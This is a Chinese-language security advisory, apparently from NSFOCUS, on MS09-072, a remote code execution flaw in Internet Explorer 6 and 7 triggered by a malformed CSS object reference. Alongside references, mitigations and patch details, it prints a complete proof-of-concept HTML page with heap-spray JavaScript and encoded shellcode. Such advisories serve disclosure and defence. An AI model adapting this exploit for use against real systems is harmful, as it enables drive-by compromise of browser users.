安全研究
安全漏洞
Microsoft IE CSS畸形对象引用远程代码执行漏洞(MS09-072)
发布日期:2009-11-20
更新日期:2009-11-23
受影响系统:
Microsoft Internet Explorer 7.0描述:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
BUGTRAQ ID: 37085
CVE ID: CVE-2009-4054,CVE-2009-3672
Internet Explorer是Windows操作系统中默认捆绑的WEB浏览器。
IE在处理非法对象访问操作时存在内存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页在用户系统上执行指令。目前这个漏洞正在被广泛的利用。
<*来源:K4mr4n_st (K4mr4n_st@yahoo.com)
链接:http://secunia.com/advisories/37448/
http://www.kb.cert.org/vuls/id/515749
http://www.microsoft.com/technet/security/advisory/977981.mspx?pf=true
http://marc.info/?l=bugtraq&m=125961774020866&w=2
http://www.us-cert.gov/cas/techalerts/TA09-342A.html
http://www.microsoft.com/technet/security/Bulletin/MS09-072.mspx?pf=true
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=833
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
</HEAD>
<BODY onload="load()">
</BODY>
</HTML>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
* 对Internet Explorer 6或Internet Explorer 7启用DEP。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS09-072)以及相应补丁:
MS09-072:Cumulative Security Update for Internet Explorer (976325)
链接:http://www.microsoft.com/technet/security/Bulletin/MS09-072.mspx?pf=true
浏览次数:2991
严重程度:0(网友投票)
绿盟科技给您安全的保障
